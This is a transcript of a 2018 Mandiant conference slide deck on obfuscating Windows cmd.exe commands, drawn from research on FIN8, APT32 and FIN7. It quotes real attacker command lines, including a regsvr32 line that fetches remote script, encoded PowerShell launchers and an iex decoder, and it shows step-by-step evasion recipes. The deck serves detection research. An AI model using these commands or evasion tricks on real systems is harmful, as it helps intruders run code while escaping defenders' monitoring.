invoke-dosfuscation€¦ · · 2018-03-23• docx/rtf + lnk w/word com to retrieve remaining...
TRANSCRIPT
![Page 1: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/1.jpg)
Invoke-DOSfuscationTechniques FOR %F IN (-style) DO (S-level CMD Obfuscation)
Daniel Bohannon (@danielhbohannon)
Senior Applied Security Researcher
Mandiant, A FireEye Company
![Page 2: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/2.jpg)
Daniel Bohannon
@danielhbohannon
Senior Applied Security Researcher
Mandiant, A FireEye Company
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
Invoke-DOSfuscationTechniques FOR %F IN (-style) DO (S-level CMD Obfuscation)
http://insights.looloo.com/wp-content/uploads/2016/10/Latte-Art-in-Manila-Featured-FB.jpg
![Page 3: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/3.jpg)
• Daniel Bohannon
• Title :: Senior Applied Security Researcher
• Team :: Advanced Practices Team @ Mandiant/FireEye
• Twitter :: @danielhbohannon
• Blog :: http://danielbohannon.com
• Projects
• Invoke-Obfuscation & Invoke-CradleCrafter
• Revoke-Obfuscation (w/@Lee_Holmes)
• Invoke-DOSfuscation
3
C:\> """who""am"i
![Page 4: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/4.jpg)
• Case studies and examples are drawn from our experiences and
activities working for a variety of customers, and do not represent our
work for any one customer or set of customers. In many cases, facts
have been changed to obscure the identity of our customers and
individuals associated with our customers.
4
DISCLAIMER:
![Page 5: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/5.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Public Release & Live Demo
Detecting DOSfuscation
5
![Page 6: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/6.jpg)
OUTLINE
C:\> State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Public Release & Live Demo
Detecting DOSfuscation
6
![Page 7: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/7.jpg)
• Why Obfuscate?
• Evade static (and some dynamic) detections
• Increase work for defenders
• How Extensive?
• Some obfuscation framework exists for almost
any scripting language that attackers like to use
• Slowing down?
• Not any time soon (but I may be biased)
7
State of Obfuscation [Red Team]
Not The Droid You're Looking For
https://i.imgur.com/lG8bRQe.jpg
![Page 8: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/8.jpg)
• Additional Host-Based Visibility
• AMSI: Antimalware Scan Interface
• ETW: Event Tracing (Windows)
• Signature-less Detection Approaches
• Revoke-Obfuscation (AST-based
PowerShell obfuscation detection
framework)
• Room for improvement?
• Absolutely, because attackers are responding by…
8
State of Obfuscation [Blue Team]
![Page 9: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/9.jpg)
• Choosing softer targets
• Disabling defensive visibility
• AMSI, ETW, Anti-forensics
• Using languages that do not provide good visibility
• JavaScript (quieter than PS, but still AMSI)
• AMSI visibility if run via Windows Script Host (VBS or
JScript)
• C# (msbuild.exe all the things)
• Custom binaries (b/c whitelisting still uncommon)
9
State of Obfuscation [Attacker Response]
http://www.syslog.com/~jwilson/pics-i-like/kurios119.jpg
![Page 10: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/10.jpg)
• What is this talk?
• NOT PowerShell (well, not entirely)
10
State of Obfuscation [My Response]
![Page 11: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/11.jpg)
• What is this talk?
• NOT PowerShell (well, not entirely)
• Cmd.exe obfuscation
• Cmd.exe visibility
• Command line arguments
• Parent/child process relationships
• Source of action on registry, files, etc.
But why an entire framework for cmd.exe obfuscation?
11
State of Obfuscation [My Response]
![Page 12: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/12.jpg)
OUTLINE
State of the Union Obfuscation
C:\> Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Public Release & Live Demo
Detecting DOSfuscation
12
![Page 13: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/13.jpg)
• June 30, 2017
• Co-authored blog post with Nick Carr
(@itsreallynick)
• Outlines three different obfuscation techniques that
MANDIANT consultants identified three threat
actors using
• Feb 2017 :: FIN8
• Apr 2017 :: APT32 (OceanLotus, Vietnam)
• Jun 2017 :: FIN7 (Carbanak)
13
Obfuscation in the Wild
![Page 14: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/14.jpg)
14
Case Study #1: FIN8
cmd /c echo %_MICROSOFT_UPDATE_CATALOG% | %_MICROSOFT_UPDATE_SERVICE%
$s=$Env:_CT;$o='';$l=$s.length;$i=$Env:_PA%$l;while($o.length -ne$l){$o+=$s[$i];$i=($i+$Env:_KE)%$l}iex($o)
powershell -
• February 2017
• Process-level environment variables + PowerShell StdIn (launched from macro)
![Page 15: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/15.jpg)
• April 2017
• Caret and un-paired double quotes in regsvr32.exe arguments
• /i:^h^t^t^p (does not show up in regsvr32.exe arguments)
• /i:"h"t"t"p (DOES show up in regsvr32.exe arguments – must be even number of quotes)
15
Case Study #2: APT32 (OceanLotus)
Host Investigative Platform (HIP) capturing real-time attacker activity during a MANDIANT incident response engagement for APT32 activity
![Page 16: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/16.jpg)
• June 2017
• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document
• Process-level environment variables + cmd.exe StdIn
• JavaScript encoding & concatenation:
• "Wor"+"d.Application" and [String.fromCharCode(101)+'va'+'l']
16
Case Study #3: FIN7 (Carbanak)
![Page 17: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/17.jpg)
17
Case Study #3: FIN7 (Carbanak)
https://i.imgur.com/tZpnpiI.gif
![Page 18: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/18.jpg)
• cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd
18
Case Study #3: FIN7 (Carbanak)
![Page 19: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/19.jpg)
• cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd
19
Case Study #3: FIN7 (Carbanak)
Process-level env var Process-level env var
![Page 20: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/20.jpg)
• cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd
20
Case Study #3: FIN7 (Carbanak)
Garbage delimiter
![Page 21: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/21.jpg)
• cmd.exe /c set x=wsc@ript /e:jscript … echo %x%|cmd
21
Case Study #3: FIN7 (Carbanak)
Garbage delimiter
![Page 22: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/22.jpg)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x%|cmd
22
Case Study #3: FIN7 (Carbanak)
Garbage delimiter
![Page 23: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/23.jpg)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x%|cmd
23
Case Study #3: FIN7 (Carbanak)
Garbage delimiter Delimiter removal
![Page 24: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/24.jpg)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x %|cmd
24
Case Study #3: FIN7 (Carbanak)
Garbage delimiter Delimiter removal
![Page 25: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/25.jpg)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x:@=%|cmd
25
Case Study #3: FIN7 (Carbanak)
Garbage delimiter Delimiter removal
![Page 26: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/26.jpg)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x:@=%|cmd
26
Case Study #3: FIN7 (Carbanak)
https://media.giphy.com/media/l4Jz3a8jO92crUlWM/giphy.gif
![Page 27: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/27.jpg)
27
Case Study #3: FIN7 (Carbanak)
• Timeline
• Wed :: June 28, 2017 – Nick Carr (@itsreallynick)
finds FIN7 testing payload
• Thu :: June 29, 2017 – We write blog post
• Fri :: June 30, 2017 – We publish blog post
• Sat/Sun :: July 1-2, 2017 – I write and release POC:
Out-FINcodedCommand
![Page 28: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/28.jpg)
28
Case Study #3: FIN7 (Carbanak)
"Is there more here?"
• Timeline
• Wed :: June 28, 2017 – Nick Carr (@itsreallynick)
finds FIN7 testing payload
• Thu :: June 29, 2017 – We write blog post
• Fri :: June 30, 2017 – We publish blog post
• Sat/Sun :: July 1-2, 2017 – I write and release POC:
Out-FINcodedCommand
![Page 29: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/29.jpg)
29
Implications of This Research
• These obfuscation techniques affect:
• Dynamic detections
• Arguments, parent/child relationship, env var, stdin
• Static detections
• All of the above + so much more
• CFP submissions ☺
https://memegenerator.net/img/images/600x600/2729805/willy-wonka.jpg
PLEASE, TELL ME MORE
ABOUT YOUR TESTING
SO YOU THINK EVENT LOGS
DEOBFUSCATE CMD ARGS
![Page 30: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/30.jpg)
30
Implications of This Research
cmd.exe /c "echo Invoke-DOSfuscation"
![Page 31: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/31.jpg)
31
Implications of This Research
cmd.exe /c "set O=fuscation&set B=oke-
DOS&&set D=echo Inv&&call %D%%B%%O%"
![Page 32: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/32.jpg)
32
Implications of This Research
cm%windir:~ -4, -3%.e^Xe,;^,/^C",;,S^Et ^
^o^=fus^cat^ion&,;,^se^T ^ ^ ^B^=o^ke-D^OS&&,;,s^Et^
^ d^=ec^ho I^nv&&,;,C^Al^l,;,^%^D%^%B%^%o^%"
![Page 33: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/33.jpg)
33
Implications of This Research
FOR /F "delims=il tokens=+4" %Z IN ('assoc .cdxml') DO %Z
,;^,/^C",;,S^Et ^ ^o^=fus^cat^ion&,;,^se^T ^ ^ ^B^=o^ke-
D^OS&&,;,s^Et^ ^ d^=ec^ho
I^nv&&,;,C^Al^l,;,^%^D%^%B%^%o%"
![Page 34: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/34.jpg)
34
Implications of This Research
^F^oR , , , , , ; ; /^f ; ; ; ; ; , " delims=il
tokens= +4 " ; ; ; , , , , %Z ; , , , , ^In , , ; ; , ,
, ( , ; ; ; ' , , , , , ; ^^a^^S^^s^^oC ; , , , , ;
.c^^d^^xm^^l ' ; , , , , ) , , , , ; , ^d^o , , , , , , ,
%Z , ; ^ ,/^C" , ; , S^Et ^ ^o^=fus^cat^ion& , ; , ^se^T
^ ^ ^B^=o^ke-D^OS&& , ; , s^Et^ ^ d^=ec^ho I^nv&& ,
; , C^Al^l , ; , ^ %^D%^%B%^%o%"
![Page 35: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/35.jpg)
35
Implications of This Research – HANG ON TIGHT
http://photos.motogp.com/2015/07/16/sunday-rider3---ross-noble_0.big.jpg
![Page 36: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/36.jpg)
36
Implications of This Research – HANG ON TIGHT AS WE STACK
http://photos.motogp.com/2015/07/16/sunday-rider3---ross-noble_0.big.jpg https://www.thesun.co.uk/wp-content/uploads/2016/04/1802881.main_image.jpg
![Page 37: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/37.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
C:\> Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Public Release & Live Demo
Detecting DOSfuscation
37
![Page 38: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/38.jpg)
• Rename/copy cmd.exe
• Cmd.exe substitutes (kind of)
• forfiles.exe (@vector_sec)
• pcalua.exe
• scriptrunner.exe (@KyleHanslovan -- Win10+)
38
Whose Binary is it Anyway: Obfuscating Binary Names
![Page 39: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/39.jpg)
• Rename/copy cmd.exe
• Cmd.exe substitutes (kind of)
• forfiles.exe (@vector_sec)
• pcalua.exe
• scriptrunner.exe (@KyleHanslovan -- Win10+)
• https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2
• Syntactical obfuscation of legitimate binary name?
39
Whose Binary is it Anyway: Obfuscating Binary Names
![Page 40: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/40.jpg)
• Env var encoding
• Nothing new
• Resolves on command line
40
Whose Binary is it Anyway: Obfuscating Binary Names
C:\> %ProgramData:~0,1%%ProgramData:~9,2%
CmD
C:\> %ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1%
Powershell
C:\> echo %ProgramData%
C:\ProgramData
C:\> echo %ProgramData:~0,1%%ProgramData:~9,2%
CmD
![Page 41: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/41.jpg)
• Something that does NOT resolve on the command line (i.e. internal commands)
• SET
• ASSOC
• FTYPE
41
Whose Binary is it Anyway: Obfuscating Binary Names
![Page 42: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/42.jpg)
• Using SET to produce the string PowerShell
42
Whose Binary is it Anyway: Obfuscating Binary Names
![Page 43: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/43.jpg)
• Using SET to produce the string PowerShell
43
Whose Binary is it Anyway: Obfuscating Binary Names
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
Required (case-sensitive) delimiters are: s and \
![Page 44: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/44.jpg)
• Using SET to produce the string PowerShell
44
Whose Binary is it Anyway: Obfuscating Binary Names
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
1 2 3 4 5 6 7 8 9 10 11 12 13
Required (case-sensitive) delimiters are: s and \
![Page 45: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/45.jpg)
• Using SET to produce the string PowerShell
45
Whose Binary is it Anyway: Obfuscating Binary Names
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
1 2 3 4 5 6 7 8 9 10 11 12 13
cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a"
Required (case-sensitive) delimiters are: s and \
![Page 46: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/46.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
C:\> Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Public Release & Live Demo
Detecting DOSfuscation
46
![Page 47: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/47.jpg)
• Typically more useful for evading static analysis detections rather than
dynamic detections
• Caret escape character (^)
• Double quotes, evenly balanced ("")
• Encapsulating parentheses
• Leading & trailing special characters
• Standard input argument hiding
47
Deep Dive: Character Insertion Obfuscation
"C:\WINDOWS\system32\cmd.exe" /c
P^o^w^e^r^S^h^e^l^l^.^e^x^e^ -NoExit -Exec Bypass -EC
IAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHk…
regsvr32.exe /s /n /u /i:"h"t"t"p://<REDACTED>.jpg scrobj.dll
,cmd;/ccalc
cmd /c echo calc|cmd
![Page 48: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/48.jpg)
• Typically more useful for evading static analysis detections rather than
dynamic detections
• Nonexistent env vars (batch files)
• https://marcin-chwedczuk.github.io/obfuscating-windows-batch-files
• Custom env vars
• Existing env vars
48
Deep Dive: Character Insertion Obfuscation
..\..\..\WINDOWS\system32\cmd.exe /V /K set p=p&&!p!owershell
-w hidden -c "IEX ((('Q0zF='+'Q0z'+'env:T'+'emp+'+'zARYUEyjv'…
echo "Find Evil!" ec%a%ho "Fi%b%nd Ev%c%il!"
C:\> echo %ProgramData%
C:\ProgramData
C:\> echo
%ProgramData:~0,1%%ProgramData:~9,2%
CmD
![Page 49: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/49.jpg)
49
Deep Dive: Character Insertion Obfuscation
• Out-FINcodedCommand POC
• A few binary syntax options with
environment variable character substitution
![Page 50: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/50.jpg)
50
Deep Dive: Character Insertion Obfuscation
• Out-FINcodedCommand POC
• A few binary syntax options with
environment variable character substitution
![Page 51: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/51.jpg)
%comspec:~-16,1%%comspec:~-1%%comspec:~-13,1%
decodes to set
• Env var encoding in the wild
• SHA-256: 661877d416f34411fad7e22246ee0d61d14de3065a34b0a7b2f28052d56db6e2
51
Deep Dive: Character Insertion Obfuscation (ITW 1/3)
![Page 52: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/52.jpg)
• Env var encoding in the wild
• SHA-256: 9e1df42f00829d16afd97c575f08da45467bbcab92ca5e3d2832a009dddaa8a7
• Obfuscator: https://github.com/guillaC/JSBatchobfuscator
52
Set full alphabet in custom env var
DECODED
Deep Dive: Character Insertion Obfuscation (ITW 2/3)
![Page 53: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/53.jpg)
Set env var called
' (single quote)
with known env
var substrings
• Env var encoding in the wild
• SHA-256: 761483906b45fad51f3c7ab66b1534dee137e93a52816aa270bc97249acb56d0 (see white paper!)
53
Assemble payload
as substrings from
newly-set ' env var
Deep Dive: Character Insertion Obfuscation (ITW 3/3)
![Page 54: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/54.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
C:\> Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Public Release & Live Demo
Detecting DOSfuscation
54
